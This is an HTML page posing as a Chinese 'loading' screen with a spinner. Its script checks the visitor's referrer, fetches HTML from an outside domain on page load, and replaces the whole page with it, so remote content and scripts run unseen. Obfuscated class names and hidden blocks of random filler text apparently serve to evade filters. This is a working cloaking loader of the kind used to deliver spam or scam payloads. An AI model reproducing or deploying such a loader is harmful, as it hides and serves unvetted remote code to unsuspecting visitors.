<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hsUHnT {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hsUHnT .nyOWflKX {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hsUHnT .content {
            line-height: 50px;
            text-align: center
        }

        .hsUHnT .img {
            width: 100%
        }

        .hsUHnT .qwmmQSnUHiS {
            text-align: center
        }

        .hsUHnT .qwmmQSnUHiS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hsUHnT .qwmmQSnUHiS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hsUHnT .qwmmQSnUHiS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hsUHnT .qwmmQSnUHiS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hsUHnT .qwmmQSnUHiS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hsUHnT .qwmmQSnUHiS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hsUHnT .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function icqOwk0pJ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var MjEMgR = icqOwk0pJ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ MjEMgR +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ MjEMgR +".html?a=share";
		}
		
        gfzUxYlj0=url+"#"+new Date().getTime();
        gfzUxYlj0 && function() {
            $.get(gfzUxYlj0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >xFFb31JCDHjj41OhFKtX</h1>
<p  style='display:none'>r52NKnWLorcf5hTAM2fveHoLP</p>
<p  style='display:none'>r52NKnWLorcf5hTAM2fveHoLP</p>
<img  src='' style='display:none'>
<div style='display:none'>kwIxYfcNcSW3Gl4DbIyUuBuqUPbwxOCqrSK7sckKdRp0r0y2grpGUl5JwflN9mGFgzLhIHO6kQJFYO9eYxlV</div><div class="hsUHnT">
    <div class="nyOWflKX">
        <div class="qwmmQSnUHiS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>aYQlKRycuimsRFeVPspqPuZ8zP1ZzIF9obnU7730DfahzhseW248kEw5OUYRw4D2RfSg8gUpuh9v4ZvXMyVLf7MFKrLumsq6d</div>
<p  style='display:none'>bP5JT4i659rQHpWDPT4U0aAjhxG66wwICAWWwxTjGTlJ2LUO5tJet8OItzeZZAtBeZhCv24KEE</p>
<div style='display:none'>aYQlKRycuimsRFeVPspqPuZ8zP1ZzIF9obnU7730DfahzhseW248kEw5OUYRw4D2RfSg8gUpuh9v4ZvXMyVLf7MFKrLumsq6d</div></body>
</html>